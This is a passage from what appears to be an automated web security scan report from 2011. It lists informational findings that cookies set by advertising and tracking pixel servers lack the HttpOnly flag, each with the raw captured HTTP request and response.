dSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlrtWjwe4OKLvE7KtEgbkcPkFFEShWCdZOSVCnDDkQcZ7HqnUdiwoMeOl35blI92a8QslLUelxYP8/7ksRF/dL4tgXNSVaB+tc0Q5yCGeoBCNTt3rHulcarLm9u5vCWFGW2APunE21aEXgSBAE52Pz5NcqBzMbUN/aEDea9hT+n/3Y/e5hgqyzCkCuGvIG755LivtanLgcg2kcQ5uwmgC0vJQMjRNKX40aTX4VArAzArEgBdkaBkXfsvkFD+Nbxz+zvek4KSXCepFAowCLMZjznkiJClqCAqKRQUoG7+ayD2Ys4bs0RrCwTlot+9B1Fervh4516lHDTrQVdcQIQ5uu++FItEtxejK+cd66ciMtQpvPlEfyhWIHOWGVBeyuJu+FtYTiNAvtNO6ZKSdLQTUzHI1ezwsB4RXs2oHFesxvqomNGH01i4; rtc_IJp3=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_IJp3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBdG2vMpqLhiqlfIGbg2pRiGwm2jLwjIZFNNncjloepKzF/B7fp/+SGbJ0yOXZRv/SaW/3lnUiep5Wav6gSjI2qPUqvUeEgbXlkljVT5OJvnSM1QD/k1XGhHkLUgfDglqsHphQF5RNoPPQUAF5zPe4lmqdb0pMuX7OErKty73eO7VPRKP4SkMz9h69umDslc8X2k9YIFEpamQE3KkuWZVdOA47VPINA6sBSWNPcu3jrE7S3pwZWROXhL9ToMj2DXxcL5QgH/YgJiEygnml4lEvpTtSueJcovSe08Bg0wMJUtyeYpE6KxA2zWEIWRtpOJGA/4rrMOTqSsyhAm1OFKTyBFA1lWo/jNAIX9E0+kluhiGx+EoEXZLjgE/WZK1aE9LcrLHH5fAvP+LWMvROLT3q0k7D4aI07ndYt27eHzLjyqXzGn/ckSL4FPfyQnQaUZ8A0orIO5lgO/pclG68MCquKPs3SWm+3+BzMoovCp+CTFVg2AhkIfWcnkIBDsEuyA6zOwABxZch6m8H9VESGBon2H48nWYP+psMh/njHmeMGo3omqHu6dHwvDkDgv3aQHiMFugRfn19oMaPXXjd3052zpCDD2uBRSWPtZs8ixmSzWKaoGrXp95UwHZQb/iFFUtTVFBIs5dbfZf9yxzYnY8ydmZHlAeWae/wzNYBRyFV4lyZWY2g0Z4uA5qQo5eJ02NWW9DfErzyizP+5KatKpgPviQZynyDaDTF3+Fa5WTnZzvfcW+4JuA8jw5b5+Cf7HWhNfjlqRgZQHjkXx+D3QocR+1TryOZ10kLFbuX1po9skn8xOrmIC9tGqvo=; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:28:27 GMT; Path=/
Set-Cookie: NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 13:28:27 GMT; Path=/
Set-Cookie: rtc_-vpp=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:28:27 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Length: 1687

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05540_10572','K05540_10573','K05540_10578','K05540_10276','K05540_10066','K05540_10087','K05540_10174','K05540_10185','K05540_10195','
...[SNIP]...
9.82. http://pixel.mathtag.com/data/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/img?mt_id=100134&mt_dcid=24&v1=&v2=&v3=&s1=&s2=&s3 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207080

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x6ff 1791
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:53 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1305207233; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:53 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
9.83. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=37026276;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%26xdm_c%3Ddefault608%26xdm_p%3D1%26;ref=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305207047666;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=23864&partnerID=77&clientID=1679&key=segment&pb=0
Set-Cookie: d=EA0AJe8kjVmM-5GL0ZmY8frRi58oyBABxAEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMWCCUo4TB0_4RDCAMHxCCAg0g4gCdE7tgqRksdDEggguzLBK3HEg_4UxZG1OoHh5pEATSAOiSAMMA7DQNGxCdKTlKOLIw; expires=Wed, 10-Aug-2011 13:31:50 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:31:50 GMT
Server: QS

9.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-444Ux5EmpXDp6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-444Ux5EmpXDp6.gif?labels=398.6 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EGwBOgHcBoHxDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EA4BOgHdBoGSDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ; expires=Wed, 10-Aug-2011 13:34:31 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Thu, 12 May 2011 13:34:31 GMT
Server: QS

GIF89a.......,.................D..;
9.85. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=489%2e1340%2e29896%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://tag.admeld.com/match?admeld_adprovider_id=247&external_user_id=xsn5NcbLoWTfyf02y5u1McaarTHfla0xlJoMIo4p
Set-Cookie: d=EI4AJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0eWJUAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 13:30:18 GMT; path=/; domain=.quantserve.com
